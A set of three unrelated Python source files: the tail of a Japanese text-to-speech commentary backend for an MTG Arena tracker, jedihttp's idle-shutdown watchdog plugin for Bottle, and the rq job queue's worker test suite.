    Returns the spoken text, or None when cid or text is missing.
    """
    # Bug fix: the original signature used a mutable default argument ({}).
    if speak_param_obj is None:
        speak_param_obj = {}
    if not (cid and text):
        return None
    if self.config.get(ConfigKey.YUKARINETTE_CONNECTOR_NEO) and save:
        # Forward the utterance to Yukarinette Connector Neo.
        self.start_http_client(self.config.get(ConfigKey.YUKARINETTE_CONNECTOR_NEO_URL) + urllib.parse.quote(text))
    speaked_text = self.seikasay2.speak(
        cid=cid,
        text=text,
        asynchronize=speak_param_obj.get(SpeakerParamKey.ASYNC),
        volume=speak_param_obj.get(SpeakerParamKey.VOLUME),
        speed=speak_param_obj.get(SpeakerParamKey.SPEED),
        pitch=speak_param_obj.get(SpeakerParamKey.PITCH),
        alpha=speak_param_obj.get(SpeakerParamKey.ALPHA),
        intonation=speak_param_obj.get(SpeakerParamKey.INTONATION),
        emotionEP=speak_param_obj.get(SpeakerParamKey.EMOTION_EP),
        emotionP=speak_param_obj.get(SpeakerParamKey.EMOTION_P),
        overBanner=speak_param_obj.get(SpeakerParamKey.OVER_BANNER)
    )
    if self.config.get(ConfigKey.WAV_OUTPUT) and save:
        # Record the equivalent SeikaSay2 command line so the user can
        # regenerate this utterance as a WAV file later.
        cmd = self.seikasay2.get_speak_command(
            cid=cid,
            text=text,
            asynchronize=speak_param_obj.get(SpeakerParamKey.ASYNC),
            save=self.WAV_OUTPUT_DIR+"\\"+datetime.now().strftime('%Y%m%d_%H%M%S_%f')+"_"+self.get_speaker_name(cid)+"「"+text+"」.wav",
            volume=speak_param_obj.get(SpeakerParamKey.VOLUME),
            speed=speak_param_obj.get(SpeakerParamKey.SPEED),
            pitch=speak_param_obj.get(SpeakerParamKey.PITCH),
            alpha=speak_param_obj.get(SpeakerParamKey.ALPHA),
            intonation=speak_param_obj.get(SpeakerParamKey.INTONATION),
            emotionEP=speak_param_obj.get(SpeakerParamKey.EMOTION_EP),
            emotionP=speak_param_obj.get(SpeakerParamKey.EMOTION_P),
            overBanner=speak_param_obj.get(SpeakerParamKey.OVER_BANNER)
        )
        with open(self.BAT_FOR_WAV_FILE, 'a') as af:
            af.write(cmd+"\n")
    return speaked_text
def on_message(self, ws, message):
    """websocket-client message callback.

    Parses the incoming JSON game event, generates commentary for it,
    echoes the line to the GUI log widget, and speaks it.
    """
    parsed = self.parse(json.loads(message))
    if parsed:
        self.logger.debug(parsed)
        cid = ""
        text = ""
        speak_param_obj = {}
        # gen_text picks the speaker (cid), the commentary text, and the
        # voice parameters for this event; empty cid/text means "say nothing".
        cid, text, speak_param_obj = self.gen_text(parsed)
        if cid and text:
            speaker = self.get_speaker_name(cid)
            if not speaker:
                speaker = ""
            self.logger.info(speaker+"「"+text+"」")
            # The log widget is normally read-only; temporarily enable it,
            # append the line, scroll to the bottom, then lock it again.
            self.master_text.config(state="normal")
            self.master_text.insert("end", speaker+"「"+text+"」\n")
            self.master_text.yview_moveto(1)
            self.master_text.config(state="disabled")
            self.speak(cid, text, speak_param_obj)
def on_error(self, ws, error):
    """websocket-client error callback: log that it fired, then the error."""
    log_error = self.logger.error
    log_error("error: called on_error")
    log_error(error)
def on_close(self, ws, close_status_code, close_msg):
    """websocket-client close callback: log the close code/message if present."""
    self.logger.info("### websocket is closed ###")
    for template, value in (("close_status_code: {}", close_status_code),
                            ("close message: {}", close_msg)):
        if value:
            self.logger.info(template.format(value))
def on_open(self, ws):
    """websocket-client open callback.

    Starts a daemon-style background thread that forwards every line typed
    on stdin straight to the websocket (useful for manually injecting
    messages while debugging).
    """
    def run(*args):
        self.logger.info("### websocket is opened ###")
        while(True):
            line = sys.stdin.readline()
            if line != "":
                self.logger.debug("debug: sending value is " + line)
                ws.send(line)
    _thread.start_new_thread(run, ())
def process_running_check(self, process_postfix):
    """Return the first running process whose executable path ends with
    *process_postfix*, or None when no such process is found.

    Processes that vanish or deny access while being inspected are skipped.
    """
    for candidate in psutil.process_iter():
        try:
            matched = candidate.exe().endswith(process_postfix)
        except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
            continue
        if matched:
            return candidate
    return None
def speak_config(self):
    """Announce (by voice) how commentary duty is split between speakers.

    Which announcement is spoken depends on the hero/opponent commentary
    assignment in config. NOTE(review): the branches are order-dependent —
    the first two cover the cases where speaker 1 narrates the hero; the
    later elif branches only fire when the earlier conditions failed.
    All announcements use save=False so they are not recorded/forwarded.
    """
    if self.config[ConfigKey.HERO_COMMENTARY_TYPE] == ConfigValue.SPEAKER1 and self.config[ConfigKey.OPPONENT_COMMENTARY_TYPE] == ConfigValue.SPEAKER1:
        # Speaker 1 narrates both players.
        self.speak(self.config[ConfigKey.SPEAKER1][ConfigKey.CID], "自分と対戦相手のアクションを実況します。", save=False)
    elif self.config[ConfigKey.HERO_COMMENTARY_TYPE] == ConfigValue.SPEAKER1 and self.config[ConfigKey.OPPONENT_COMMENTARY_TYPE] == ConfigValue.SPEAKER2:
        # Speaker 1 narrates the hero, speaker 2 the opponent.
        self.speak(self.config[ConfigKey.SPEAKER1][ConfigKey.CID], "自分のアクションを実況します。", save=False)
        self.speak(self.config[ConfigKey.SPEAKER2][ConfigKey.CID], "対戦相手のアクションを実況します。", save=False)
    elif self.config[ConfigKey.HERO_COMMENTARY_TYPE] == ConfigValue.SPEAKER1:
        # Only the hero's actions are narrated.
        self.speak(self.config[ConfigKey.SPEAKER1][ConfigKey.CID], "自分のアクションだけを実況します。", save=False)
    elif self.config[ConfigKey.OPPONENT_COMMENTARY_TYPE] == ConfigValue.SPEAKER1:
        # Only the opponent's actions are narrated, by speaker 1.
        self.speak(self.config[ConfigKey.SPEAKER1][ConfigKey.CID], "対戦相手のアクションだけを実況します。", save=False)
    elif self.config[ConfigKey.OPPONENT_COMMENTARY_TYPE] == ConfigValue.SPEAKER2:
        # Only the opponent's actions are narrated, by speaker 2.
        self.speak(self.config[ConfigKey.SPEAKER2][ConfigKey.CID], "対戦相手のアクションを実況します。", save=False)
def run(self):
    """Main startup sequence and event loop.

    Verifies the required external pieces are available
    (mtgatracker_backend process, AssistantSeika process, SeikaSay2.exe),
    fetches the speaker list, normalizes speaker configuration, opens the
    config window, starts the websocket client, announces the config, and
    finally enters the Tk main loop. On exit the websocket is closed and
    the mtgatracker_backend process tree is terminated.
    """
    self.logger.info("mtgatracker_backend.exe running check")
    running = False
    while not running:
        mtgatracker_backend = self.process_running_check(ProcessName.MTGATRACKER_BACKEND)
        running = True if mtgatracker_backend else False
        if not running:
            # Yes = retry the check, No = continue anyway.
            ans = messagebox.askyesno("mtgatracker_backend 起動確認", "{} プロセスが見つかりませんでした。\r\nmtgatracker_backendが起動していない可能性があります。\r\nはい: 再試行\r\nいいえ: 無視して続行".format(ProcessName.MTGATRACKER_BACKEND))
            if ans == True:
                pass
            elif ans == False:
                self.logger.info("mtgatracker_backend.exe running check: NG")
                running = True
        else:
            self.logger.info("mtgatracker_backend.exe running check: OK")
    self.logger.info("AssistantSeika running check")
    running = False
    while not running:
        running = self.process_running_check(ProcessName.ASSISTANT_SEIKA)
        if not running:
            # Yes = retry the check, No = continue anyway.
            ans = messagebox.askyesno("AssistantSeika 起動確認", "{} プロセスが見つかりませんでした。\r\nAssistantSeikaが起動していない可能性があります。\r\nはい: 再試行\r\nいいえ: 無視して続行".format(ProcessName.ASSISTANT_SEIKA))
            if ans == True:
                pass
            elif ans == False:
                self.logger.info("AssistantSeika running check: NG")
                running = True
        else:
            self.logger.info("AssistantSeika running check: OK")
    self.logger.info(ProcessName.SEIKA_SAY2+" existence check")
    running = False
    while not running:
        if os.path.exists(self.config.get(ConfigKey.SEIKA_SAY2_PATH)):
            running = True
        else:
            # Ask the user to locate SeikaSay2.exe via a file dialog.
            messagebox.showinfo(ProcessName.SEIKA_SAY2+" 存在確認", "{} が見つかりませんでした。\r\nこの後に表示されるファイルダイアログで {} を選択してください。".format(ProcessName.SEIKA_SAY2, ProcessName.SEIKA_SAY2))
            self.config[ConfigKey.SEIKA_SAY2_PATH] = filedialog.askopenfilename(filetype=[(ProcessName.SEIKA_SAY2,"*.exe")], initialdir=os.getcwd())
    self.seikasay2 = SeikaSay2(self.config.get(ConfigKey.SEIKA_SAY2_PATH))
    self.logger.info("Get speakers from AssistantSeika")
    running = False
    while not running:
        self.get_speaker_list()
        if self.cids:
            running = True
            self.logger.info("Get cids from AssistantSeika: OK")
            break
        else:
            # Empty speaker list: product scan may not have run yet.
            # Yes = retry, No = continue anyway.
            ans = messagebox.askyesno("AssistantSeika 話者一覧取得", "AssistantSeikaの話者一覧が空です。\r\n製品スキャンが未実行か、AssistantSeikaに対応している音声合成製品が未起動である可能性があります。\r\nはい: 再試行\r\nいいえ: 無視して続行")
            if ans == True:
                pass
            elif ans == False:
                self.logger.info("Get cids from AssistantSeika: NG")
                running = True
    self.logger.debug(self.speakers)
    # Fall back to the first available cid for any speaker whose configured
    # cid is missing or no longer present in the fetched list.
    if not self.config.get(ConfigKey.SPEAKER1).get(ConfigKey.CID):
        self.config[ConfigKey.SPEAKER1][ConfigKey.CID] = self.cids[0]
    if not self.config.get(ConfigKey.SPEAKER2).get(ConfigKey.CID):
        self.config[ConfigKey.SPEAKER2][ConfigKey.CID] = self.cids[0]
    if not self.config[ConfigKey.SPEAKER1][ConfigKey.CID] in self.cids:
        self.config[ConfigKey.SPEAKER1][ConfigKey.CID] = self.cids[0]
    if not self.config[ConfigKey.SPEAKER2][ConfigKey.CID] in self.cids:
        self.config[ConfigKey.SPEAKER2][ConfigKey.CID] = self.cids[0]
    # NOTE(review): this unconditionally reassigns opponent commentary from
    # speaker 2 to speaker 1 — confirm whether it should be gated on
    # speaker 2 being unavailable.
    if self.config[ConfigKey.OPPONENT_COMMENTARY_TYPE] == ConfigValue.SPEAKER2:
        self.config[ConfigKey.OPPONENT_COMMENTARY_TYPE] = ConfigValue.SPEAKER1
    self.open_config_window()
    self.logger.info("話者1: {}".format(self.config.get(ConfigKey.SPEAKER1).get(ConfigKey.NAME)))
    self.logger.info("話者2: {}".format(self.config.get(ConfigKey.SPEAKER2).get(ConfigKey.NAME)))
    self.speaker1_obj = self.load_speaker(self.config.get(ConfigKey.SPEAKER1).get(ConfigKey.CID))
    self.speaker2_obj = self.load_speaker(self.config.get(ConfigKey.SPEAKER2).get(ConfigKey.CID))
    self.start_ws_client()
    self.speak_config()
    # Blocks here until the GUI window is closed.
    self.master.mainloop()
    #try:
    #    self.ws.run_forever()
    #except KeyboardInterrupt:
    #    self.ws.close()
    self.ws.close()
    # Stop mtgatracker_backend: terminate its children first, then the
    # parent. NOTE(review): if the user chose to continue without the
    # backend earlier, mtgatracker_backend is None and this raises —
    # confirm whether that path needs a guard.
    pid_list=[pc.pid for pc in mtgatracker_backend.children(recursive=True)]
    for pid in pid_list:
        psutil.Process(pid).terminate()
        self.logger.debug("terminate 子プロセス {}" .format(pid))
    mtgatracker_backend.terminate()
    self.logger.debug("terminate 親プロセス {}" .format(mtgatracker_backend.pid))
if __name__ == "__main__":
    #param = sys.argv
    # Create the Tk root window, attach the commentary backend to it, and
    # run the startup sequence / GUI main loop.
    root = tkinter.Tk()
    commentary_backend = CommentaryBackend(master=root)
    commentary_backend.run()
|
watchdog_plugin.py
|
# Copyright 2017 Cedraro Andrea <a.cedraro@gmail.com>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import copy
import logging
from threading import Thread, Lock
from jedihttp.handlers import server_shutdown
class WatchdogPlugin(object):
    """
    Bottle plugin (http://bottlepy.org/docs/dev/plugindev.html) for
    automatically shutting down the server if no request is made within
    |idle_suicide_seconds| seconds. Checks are done every
    |check_interval_seconds| seconds.
    """
    name = 'watchdog'
    api = 2

    def __init__(self, idle_suicide_seconds, check_interval_seconds):
        self._logger = logging.getLogger(__name__)
        self._check_interval_seconds = check_interval_seconds
        self._idle_suicide_seconds = idle_suicide_seconds
        # No need for a lock on wakeup time since only the watchdog thread ever
        # reads or sets it.
        self._last_wakeup_time = time.time()
        self._last_request_time = time.time()
        self._last_request_time_lock = Lock()
        if idle_suicide_seconds <= 0:
            # Watchdog disabled: do not start the background thread.
            return
        self._watchdog_thread = Thread(target=self._watchdog_main)
        self._watchdog_thread.daemon = True
        self._watchdog_thread.start()

    def _get_last_request_time(self):
        """Thread-safe read of the last request timestamp."""
        # time.time() returns an immutable float, so a plain read under the
        # lock suffices; the previous copy.deepcopy() call was pointless.
        with self._last_request_time_lock:
            return self._last_request_time

    def _set_last_request_time(self, last_request_time):
        """Thread-safe write of the last request timestamp."""
        with self._last_request_time_lock:
            self._last_request_time = last_request_time

    def _time_since_last_request(self):
        """Seconds elapsed since the last request was recorded."""
        return time.time() - self._get_last_request_time()

    def _time_since_last_wakeup(self):
        """Seconds elapsed since the watchdog last woke up."""
        return time.time() - self._last_wakeup_time

    def _update_last_wakeup_time(self):
        self._last_wakeup_time = time.time()

    def _watchdog_main(self):
        """Background loop: periodically check idleness and shut down."""
        while True:
            time.sleep(self._check_interval_seconds)
            # We make sure we don't terminate if we skipped a wakeup time. If
            # we skipped a check, that means the machine probably went to sleep
            # and the client might still actually be up. In such cases, we give
            # it one more wait interval to contact us before we die.
            if (self._time_since_last_request() >
                    self._idle_suicide_seconds and
                    self._time_since_last_wakeup() <
                    2 * self._check_interval_seconds):
                self._logger.info('Shutting down server due to inactivity.')
                server_shutdown()
            self._update_last_wakeup_time()

    def __call__(self, callback):
        """Bottle plugin hook: wrap *callback* to record request times."""
        def wrapper(*args, **kwargs):
            self._set_last_request_time(time.time())
            return callback(*args, **kwargs)
        return wrapper
|
test_worker.py
|
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import os
import shutil
import signal
import subprocess
import sys
import time
import zlib
from datetime import datetime, timedelta
from multiprocessing import Process
from time import sleep
from unittest import skipIf
import pytest
import mock
from mock import Mock
from tests import RQTestCase, slow
from tests.fixtures import (
access_self, create_file, create_file_after_timeout, div_by_zero, do_nothing,
kill_worker, long_running_job, modify_self, modify_self_and_error,
run_dummy_heroku_worker, save_key_ttl, say_hello, say_pid,
)
from rq import Queue, SimpleWorker, Worker, get_current_connection
from rq.compat import as_text, PY2
from rq.job import Job, JobStatus
from rq.registry import StartedJobRegistry, FailedJobRegistry, FinishedJobRegistry
from rq.suspension import resume, suspend
from rq.utils import utcnow
from rq.version import VERSION
from rq.worker import HerokuWorker, WorkerStatus
class CustomJob(Job):
    """Job subclass used by tests that verify Worker honors a custom job_class."""
    pass
class CustomQueue(Queue):
    """Queue subclass used by tests that verify Worker honors a custom queue_class."""
    pass
class TestWorker(RQTestCase):
def test_create_worker(self):
"""Worker creation using various inputs."""
# With single string argument
w = Worker('foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of strings
w = Worker(['foo', 'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
self.assertEqual(w.queue_keys(), [w.queues[0].key, w.queues[1].key])
self.assertEqual(w.queue_names(), ['foo', 'bar'])
# With iterable of strings
w = Worker(iter(['foo', 'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# Also accept byte strings in Python 2
if PY2:
# With single byte string argument
w = Worker(b'foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of byte strings
w = Worker([b'foo', b'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With iterable of byte strings
w = Worker(iter([b'foo', b'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With single Queue
w = Worker(Queue('foo'))
self.assertEqual(w.queues[0].name, 'foo')
# With iterable of Queues
w = Worker(iter([Queue('foo'), Queue('bar')]))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With list of Queues
w = Worker([Queue('foo'), Queue('bar')])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With string and serializer
w = Worker('foo', serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
# With queue having serializer
w = Worker(Queue('foo'), serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
def test_work_and_quit(self):
"""Worker processes work, then quits."""
fooq, barq = Queue('foo'), Queue('bar')
w = Worker([fooq, barq])
self.assertEqual(
w.work(burst=True), False,
'Did not expect any work on the queue.'
)
fooq.enqueue(say_hello, name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
def test_worker_all(self):
"""Worker.all() works properly"""
foo_queue = Queue('foo')
bar_queue = Queue('bar')
w1 = Worker([foo_queue, bar_queue], name='w1')
w1.register_birth()
w2 = Worker([foo_queue], name='w2')
w2.register_birth()
self.assertEqual(
set(Worker.all(connection=foo_queue.connection)),
set([w1, w2])
)
self.assertEqual(set(Worker.all(queue=foo_queue)), set([w1, w2]))
self.assertEqual(set(Worker.all(queue=bar_queue)), set([w1]))
w1.register_death()
w2.register_death()
def test_find_by_key(self):
"""Worker.find_by_key restores queues, state and job_id."""
queues = [Queue('foo'), Queue('bar')]
w = Worker(queues)
w.register_death()
w.register_birth()
w.set_state(WorkerStatus.STARTED)
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.queues, queues)
self.assertEqual(worker.get_state(), WorkerStatus.STARTED)
self.assertEqual(worker._job_id, None)
self.assertTrue(worker.key in Worker.all_keys(worker.connection))
self.assertEqual(worker.version, VERSION)
# If worker is gone, its keys should also be removed
worker.connection.delete(worker.key)
Worker.find_by_key(worker.key)
self.assertFalse(worker.key in Worker.all_keys(worker.connection))
self.assertRaises(ValueError, Worker.find_by_key, 'foo')
def test_worker_ttl(self):
"""Worker ttl."""
w = Worker([])
w.register_birth()
[worker_key] = self.testconn.smembers(Worker.redis_workers_keys)
self.assertIsNotNone(self.testconn.ttl(worker_key))
w.register_death()
def test_work_via_string_argument(self):
"""Worker processes work fed via string arguments."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Frank!')
def test_job_times(self):
"""job times are set correctly."""
q = Queue('foo')
w = Worker([q])
before = utcnow()
before = before.replace(microsecond=0)
job = q.enqueue(say_hello)
self.assertIsNotNone(job.enqueued_at)
self.assertIsNone(job.started_at)
self.assertIsNone(job.ended_at)
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Stranger!')
after = utcnow()
job.refresh()
self.assertTrue(
before <= job.enqueued_at <= after,
'Not %s <= %s <= %s' % (before, job.enqueued_at, after)
)
self.assertTrue(
before <= job.started_at <= after,
'Not %s <= %s <= %s' % (before, job.started_at, after)
)
self.assertTrue(
before <= job.ended_at <= after,
'Not %s <= %s <= %s' % (before, job.ended_at, after)
)
def test_work_is_unreadable(self):
"""Unreadable jobs are put on the failed job registry."""
q = Queue()
self.assertEqual(q.count, 0)
# NOTE: We have to fake this enqueueing for this test case.
# What we're simulating here is a call to a function that is not
# importable from the worker process.
job = Job.create(func=div_by_zero, args=(3,), origin=q.name)
job.save()
job_data = job.data
invalid_data = job_data.replace(b'div_by_zero', b'nonexisting')
assert job_data != invalid_data
self.testconn.hset(job.key, 'data', zlib.compress(invalid_data))
# We use the low-level internal function to enqueue any data (bypassing
# validity checks)
q.push_job_id(job.id)
self.assertEqual(q.count, 1)
# All set, we're going to process it
w = Worker([q])
w.work(burst=True) # should silently pass
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
def test_heartbeat(self):
"""Heartbeat saves last_heartbeat"""
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(str(w.pid), as_text(self.testconn.hget(w.key, 'pid')))
self.assertEqual(w.hostname,
as_text(self.testconn.hget(w.key, 'hostname')))
last_heartbeat = self.testconn.hget(w.key, 'last_heartbeat')
self.assertIsNotNone(self.testconn.hget(w.key, 'birth'))
self.assertTrue(last_heartbeat is not None)
w = Worker.find_by_key(w.key)
self.assertIsInstance(w.last_heartbeat, datetime)
# worker.refresh() shouldn't fail if last_heartbeat is None
# for compatibility reasons
self.testconn.hdel(w.key, 'last_heartbeat')
w.refresh()
# worker.refresh() shouldn't fail if birth is None
# for compatibility reasons
self.testconn.hdel(w.key, 'birth')
w.refresh()
@slow
def test_heartbeat_busy(self):
"""Periodic heartbeats while horse is busy with long jobs"""
q = Queue()
w = Worker([q], job_monitoring_interval=5)
for timeout, expected_heartbeats in [(2, 0), (7, 1), (12, 2)]:
job = q.enqueue(long_running_job,
args=(timeout,),
job_timeout=30,
result_ttl=-1)
with mock.patch.object(w, 'heartbeat', wraps=w.heartbeat) as mocked:
w.execute_job(job, q)
self.assertEqual(mocked.call_count, expected_heartbeats)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_work_fails(self):
"""Failing jobs are put on the failed queue."""
q = Queue()
self.assertEqual(q.count, 0)
# Action
job = q.enqueue(div_by_zero)
self.assertEqual(q.count, 1)
# keep for later
enqueued_at_date = str(job.enqueued_at)
w = Worker([q])
w.work(burst=True) # should silently pass
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
# Check the job
job = Job.fetch(job.id)
self.assertEqual(job.origin, q.name)
# Should be the original enqueued_at date, not the date of enqueueing
# to the failed queue
self.assertEqual(str(job.enqueued_at), enqueued_at_date)
self.assertTrue(job.exc_info) # should contain exc_info
def test_statistics(self):
"""Successful and failed job counts are saved properly"""
queue = Queue()
job = queue.enqueue(div_by_zero)
worker = Worker([queue])
worker.register_birth()
self.assertEqual(worker.failed_job_count, 0)
self.assertEqual(worker.successful_job_count, 0)
self.assertEqual(worker.total_working_time, 0)
registry = StartedJobRegistry(connection=worker.connection)
job.started_at = utcnow()
job.ended_at = job.started_at + timedelta(seconds=0.75)
worker.handle_job_failure(job)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 1)
self.assertEqual(worker.successful_job_count, 1)
self.assertEqual(worker.total_working_time, 1.5) # 1.5 seconds
worker.handle_job_failure(job)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 2)
self.assertEqual(worker.successful_job_count, 2)
self.assertEqual(worker.total_working_time, 3.0)
def test_total_working_time(self):
"""worker.total_working_time is stored properly"""
queue = Queue()
job = queue.enqueue(long_running_job, 0.05)
worker = Worker([queue])
worker.register_birth()
worker.perform_job(job, queue)
worker.refresh()
# total_working_time should be a little bit more than 0.05 seconds
self.assertGreaterEqual(worker.total_working_time, 0.05)
# in multi-user environments delays might be unpredictable,
# please adjust this magic limit accordingly in case if It takes even longer to run
self.assertLess(worker.total_working_time, 1)
def test_max_jobs(self):
"""Worker exits after number of jobs complete."""
queue = Queue()
job1 = queue.enqueue(do_nothing)
job2 = queue.enqueue(do_nothing)
worker = Worker([queue])
worker.work(max_jobs=1)
self.assertEqual(JobStatus.FINISHED, job1.get_status())
self.assertEqual(JobStatus.QUEUED, job2.get_status())
def test_disable_default_exception_handler(self):
"""
Job is not moved to FailedJobRegistry when default custom exception
handler is disabled.
"""
queue = Queue(name='default', connection=self.testconn)
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=False)
worker.work(burst=True)
registry = FailedJobRegistry(queue=queue)
self.assertTrue(job in registry)
# Job is not added to FailedJobRegistry if
# disable_default_exception_handler is True
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=True)
worker.work(burst=True)
self.assertFalse(job in registry)
def test_custom_exc_handling(self):
"""Custom exception handling."""
def first_handler(job, *exc_info):
job.meta = {'first_handler': True}
job.save_meta()
return True
def second_handler(job, *exc_info):
job.meta.update({'second_handler': True})
job.save_meta()
def black_hole(job, *exc_info):
# Don't fall through to default behaviour (moving to failed queue)
return False
q = Queue()
self.assertEqual(q.count, 0)
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=first_handler)
w.work(burst=True)
# Check the job
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, second_handler])
w.work(burst=True)
# Both custom exception handlers are run
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertTrue(job.meta['second_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, black_hole,
second_handler])
w.work(burst=True)
# second_handler is not run since it's interrupted by black_hole
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertEqual(job.meta.get('second_handler'), None)
def test_cancelled_jobs_arent_executed(self):
"""Cancelling jobs."""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
job = q.enqueue(create_file, SENTINEL_FILE)
# Here, we cancel the job, so the sentinel file may not be created
self.testconn.delete(job.key)
w = Worker([q])
w.work(burst=True)
assert q.count == 0
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
@slow # noqa
def test_timeouts(self):
"""Worker kills jobs after timeout."""
sentinel_file = '/tmp/.rq_sentinel'
q = Queue()
w = Worker([q])
# Put it on the queue with a timeout value
res = q.enqueue(create_file_after_timeout,
args=(sentinel_file, 4),
job_timeout=1)
try:
os.unlink(sentinel_file)
except OSError as e:
if e.errno == 2:
pass
self.assertEqual(os.path.exists(sentinel_file), False)
w.work(burst=True)
self.assertEqual(os.path.exists(sentinel_file), False)
# TODO: Having to do the manual refresh() here is really ugly!
res.refresh()
self.assertIn('JobTimeoutException', as_text(res.exc_info))
def test_worker_sets_result_ttl(self):
"""Ensure that Worker properly sets result_ttl for individual jobs."""
q = Queue()
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertNotEqual(self.testconn.ttl(job.key), 0)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
# Job with -1 result_ttl don't expire
job = q.enqueue(say_hello, args=('Frank',), result_ttl=-1)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.ttl(job.key), -1)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
# Job with result_ttl = 0 gets deleted immediately
job = q.enqueue(say_hello, args=('Frank',), result_ttl=0)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.get(job.key), None)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
def test_worker_sets_job_status(self):
"""Ensure that worker correctly sets job status."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello)
self.assertEqual(job.get_status(), JobStatus.QUEUED)
self.assertEqual(job.is_queued, True)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, False)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, True)
self.assertEqual(job.is_failed, False)
# Failed jobs should set status to "failed"
job = q.enqueue(div_by_zero, args=(1,))
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FAILED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, True)
def test_job_dependency(self):
"""Enqueue dependent jobs only if their parents don't fail"""
q = Queue()
w = Worker([q])
parent_job = q.enqueue(say_hello, result_ttl=0)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
parent_job = q.enqueue(div_by_zero)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertNotEqual(job.get_status(), JobStatus.FINISHED)
def test_get_current_job(self):
"""Ensure worker.get_current_job() works properly"""
q = Queue()
worker = Worker([q])
job = q.enqueue_call(say_hello)
self.assertEqual(self.testconn.hget(worker.key, 'current_job'), None)
worker.set_current_job_id(job.id)
self.assertEqual(
worker.get_current_job_id(),
as_text(self.testconn.hget(worker.key, 'current_job'))
)
self.assertEqual(worker.get_current_job(), job)
def test_custom_job_class(self):
"""Ensure Worker accepts custom job class."""
q = Queue()
worker = Worker([q], job_class=CustomJob)
self.assertEqual(worker.job_class, CustomJob)
def test_custom_queue_class(self):
"""Ensure Worker accepts custom queue class."""
q = CustomQueue()
worker = Worker([q], queue_class=CustomQueue)
self.assertEqual(worker.queue_class, CustomQueue)
def test_custom_queue_class_is_not_global(self):
"""Ensure Worker custom queue class is not global."""
q = CustomQueue()
worker_custom = Worker([q], queue_class=CustomQueue)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.queue_class, CustomQueue)
self.assertEqual(worker_generic.queue_class, Queue)
